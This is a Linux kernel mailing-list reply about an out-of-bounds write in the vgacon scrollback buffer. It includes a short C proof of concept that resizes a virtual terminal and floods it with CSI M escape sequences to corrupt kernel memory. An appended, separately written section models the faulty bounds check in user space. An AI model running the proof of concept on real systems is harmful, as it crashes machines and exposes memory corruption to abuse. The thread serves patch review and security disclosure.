Subject: Re: [PATCH] vgacon: fix out of bounds write to the scrollback buffer
To: 张云海, b.zolnierkie@samsung.com
Cc: linux-kernel@vger.kernel.org, Yang Yingliang, Kyungtae Kim, Linus Torvalds, Greg KH, Solar Designer, "Srivatsa S. Bhat", Anthony Liguori, Security Officers, linux-distros@vs.openwall.org, dri-devel@lists.freedesktop.org, linux-fbdev@vger.kernel.org
From: Jiri Slaby
Date: Wed, 29 Jul 2020 13:20:00 +0200

On 29. 07. 20, 10:19, 张云海 wrote:
> On 2020/7/29 16:11, Jiri Slaby wrote:
>> But the loop checks for the overflow:
>> if (vgacon_scrollback_cur->tail >= vgacon_scrollback_cur->size)
>>         vgacon_scrollback_cur->tail = 0;
>>
>> So the first 2 iterations would write to the end of the buffer and this
>> 3rd one should have zeroed ->tail.
>
> In the 2nd iteration before the check:
> vgacon_scrollback_cur->tail is 65360 which is still less than
> vgacon_scrollback_cur->size (65440), so the ->tail won't be zeroed.
>
> Then it goes to the 3rd iteration, overflow occurs.

Ahh, I see now! So it must be triggered by CSI M instead. It allows for
more than 1 in count.
So this is a PoC for this case:

#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

int main(int argc, char** argv)
{
	int fd = open("/dev/tty1", O_RDWR);
	unsigned short size[3] = {25, 200, 0};
	ioctl(fd, 0x5609, size); // VT_RESIZE

	write(fd, "\e[1;1H", 6);
	for (int i = 0; i < 30; i++)
		write(fd, "\e[10M", 5);
}

It corrupts memory, so it crashes the kernel randomly. Even with my
before-loop patch.

So now: could you resend your patch with an improved commit message, add
all those Ccs etc.? You can copy most of the Ccs from my patch verbatim.

I am also not sure the test I was pointing out at the top of this message
would be of any use after the change. But maybe leave the code to rest in
peace.

thanks,
-- 
js
suse labs
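A constructed user-space model of the bounds check discussed in the thread above (added here; it is not the kernel's vgacon code and was not posted by anyone in the thread). It shows why a wrap check that runs only after the row has been copied lets a partial row spill past the buffer once the row size does not divide the buffer size, next to a variant that checks before the copy. The 65440-byte buffer size is the one quoted above; the 400-byte row (200 columns from the PoC's VT_RESIZE, 2 bytes per cell) is an assumption.

```c
#include <stdio.h>
#include <string.h>

/* Constructed model of the ring-buffer loop quoted in the thread, not the kernel's
 * vgacon code. Assumptions: 65440 bytes is the buffer size quoted above; 400 bytes
 * is one row of the 200-column console the PoC resizes to (2 bytes per cell). */
#define SB_SIZE 65440u
struct scrollback { unsigned char data[SB_SIZE]; size_t tail; size_t size; };
static void sb_init(struct scrollback *sb) { memset(sb, 0, sizeof(*sb)); sb->size = SB_SIZE; }

/* Loop as quoted: copy a row at tail, advance, and only then wrap tail. Instead of
 * writing past data[], the bytes a memcpy would have spilled are counted and returned. */
static size_t push_rows_post_check(struct scrollback *sb, size_t row, unsigned count)
{
	size_t spilled = 0;
	while (count--) {
		if (sb->tail + row > sb->size)
			spilled += sb->tail + row - sb->size;	/* would overflow here */
		else
			memset(sb->data + sb->tail, 'A', row);
		sb->tail += row;
		if (sb->tail >= sb->size)	/* too late: the row is already written */
			sb->tail = 0;
	}
	return spilled;
}

/* Hardened variant: wrap before the copy whenever a whole row does not fit. */
static size_t push_rows_pre_check(struct scrollback *sb, size_t row, unsigned count)
{
	while (count--) {
		if (sb->tail + row > sb->size)
			sb->tail = 0;
		memset(sb->data + sb->tail, 'A', row);
		sb->tail += row;
		if (sb->tail >= sb->size)
			sb->tail = 0;
	}
	return 0;	/* never spills: every copy fits by construction */
}

int main(void)
{
	static struct scrollback sb;	/* static: 64 KiB is too large for a small stack */
	sb_init(&sb);	/* 163 rows of 400 bytes fit (65200); the 164th would spill 160 */
	printf("post-check spill: %zu bytes\n", push_rows_post_check(&sb, 400, 164));
	sb_init(&sb);
	printf("pre-check spill:  %zu bytes\n", push_rows_pre_check(&sb, 400, 164));
	return 0;
}
```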